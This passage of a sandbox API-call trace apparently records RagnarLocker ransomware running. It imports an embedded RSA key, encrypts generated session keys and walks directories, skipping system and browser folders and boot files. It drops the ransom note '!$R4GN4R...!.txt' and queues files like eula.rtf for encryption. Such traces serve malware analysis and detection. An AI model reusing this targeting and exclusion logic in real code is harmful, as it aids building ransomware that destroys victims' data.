dwFlags=0xf0000000 | out: phProv=0x3586900*=0x5d26498) returned 1 [0175.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0175.922] GetProcessHeap () returned 0x3520000 [0175.922] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358ec10 [0175.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358ec10, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0175.923] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0175.923] GetProcessHeap () returned 0x3520000 [0175.923] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0175.923] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0175.923] GetProcessHeap () returned 0x3520000 [0175.923] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358ec10 | out: hHeap=0x3520000) returned 1 [0175.923] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0175.923] CryptImportPublicKeyInfo (in: hCryptProv=0x5d26498, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x3586904 | out: phKey=0x3586904*=0x3548240) returned 1 [0175.923] GetProcessHeap () returned 0x3520000 [0175.923] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0175.923] LocalFree (hMem=0x35948f0) returned 0x0 [0175.923] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d26c90) returned 1 [0175.924] CryptGenRandom (in: hProv=0x5d26c90, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0175.924] CryptReleaseContext (hProv=0x5d26c90, dwFlags=0x0) returned 1 [0175.924] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0175.926] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26a70) returned 1 [0175.927] CryptGenRandom (in: hProv=0x5d26a70, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0175.927] CryptReleaseContext (hProv=0x5d26a70, dwFlags=0x0) returned 1 [0175.927] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0175.929] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26300) returned 1 [0175.929] CryptGenRandom (in: hProv=0x5d26300, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0175.929] CryptReleaseContext (hProv=0x5d26300, dwFlags=0x0) returned 1 [0175.929] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0175.931] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d266b8) returned 1 [0175.932] CryptGenRandom (in: hProv=0x5d266b8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0175.932] CryptReleaseContext (hProv=0x5d266b8, dwFlags=0x0) returned 1 [0175.932] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0175.934] CryptEncrypt (in: hKey=0x3548240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.935] GetLastError () returned 0x80090016 [0175.935] CryptEncrypt (in: hKey=0x3548240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.935] GetLastError () returned 0x80090016 [0175.935] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x1350) returned 0x3f0 [0175.935] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d269e8) returned 1 [0175.936] CryptGenRandom (in: hProv=0x5d269e8, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0175.936] CryptReleaseContext (hProv=0x5d269e8, dwFlags=0x0) returned 1 [0175.936] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0175.938] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26740) returned 1 [0175.938] CryptGenRandom (in: hProv=0x5d26740, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0175.938] CryptReleaseContext (hProv=0x5d26740, dwFlags=0x0) returned 1 [0175.938] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0175.941] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26eb0) returned 1 [0175.942] CryptGenRandom (in: hProv=0x5d26eb0, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0175.942] CryptReleaseContext (hProv=0x5d26eb0, dwFlags=0x0) returned 1 [0175.942] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0175.944] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26740) returned 1 [0175.944] CryptGenRandom (in: hProv=0x5d26740, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0175.944] CryptReleaseContext (hProv=0x5d26740, dwFlags=0x0) returned 1 [0175.944] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0175.946] CryptEncrypt (in: hKey=0x3548240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.947] GetLastError () returned 0x80090016 [0175.947] CryptEncrypt (in: hKey=0x3548240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.947] GetLastError () returned 0x80090016 [0175.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x1348) returned 0x3b4 [0175.948] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0176.292] GetProcessHeap () returned 0x3520000 [0176.293] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586900 | out: hHeap=0x3520000) returned 1 [0176.293] CloseHandle (hObject=0x3f0) returned 1 [0176.293] GetProcessHeap () returned 0x3520000 [0176.293] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0176.293] CloseHandle (hObject=0x3b4) returned 1 [0176.293] GetProcessHeap () returned 0x3520000 [0176.293] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0176.295] FindClose (in: hFindFile=0x3547fc0 | out: hFindFile=0x3547fc0) returned 1 [0176.296] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1053", cAlternateFileName="")) returned 1 [0176.296] lstrcmpiW (lpString1="1053", lpString2=".") returned 1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="..") returned 1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="Windows") returned -1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="Windows.old") returned -1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="Tor browser") returned -1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="Internet Explorer") returned -1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="Google") returned -1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="Opera") returned -1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="Opera Software") returned -1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="Mozilla") returned -1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="Mozilla Firefox") returned -1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="$Recycle.Bin") returned 1 [0176.296] lstrcmpiW (lpString1="1053", lpString2="ProgramData") returned -1 [0176.297] lstrcmpiW (lpString1="1053", lpString2="All Users") returned -1 [0176.297] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0176.297] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1053" | out: lpString1="1053") returned="1053" [0176.297] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\" [0176.297] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1053\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\" [0176.297] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\!$R4GN4R_B8CF767A$!.txt" [0176.297] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1053\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0176.306] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*" [0176.306] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.306] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0176.306] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0176.306] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547cc0 [0176.306] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0176.307] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf66cf359, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.308] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0176.308] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0176.308] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf66a91de, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf66a91de, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0176.308] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0176.308] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0176.308] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0176.308] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0176.308] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0176.308] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0176.308] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0176.308] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0176.308] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0176.308] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0176.308] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0176.308] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0176.309] FindClose (in: hFindFile=0x3547cc0 | out: hFindFile=0x3547cc0) returned 1 [0176.310] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547fc0 [0176.310] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf66cf359, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf66cf359, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.311] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf66a91de, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf66a91de, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0176.311] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.311] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0176.311] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1053\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0176.311] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0176.311] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0176.311] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.311] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0176.312] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf") returned=".rtf" [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0176.312] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0176.312] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0176.312] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0176.312] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0176.312] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0176.312] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0176.312] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0176.312] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0176.312] GetProcessHeap () returned 0x3520000 [0176.313] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0176.314] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" [0176.314] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0176.314] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.314] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0176.314] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned=".xml" [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0176.314] 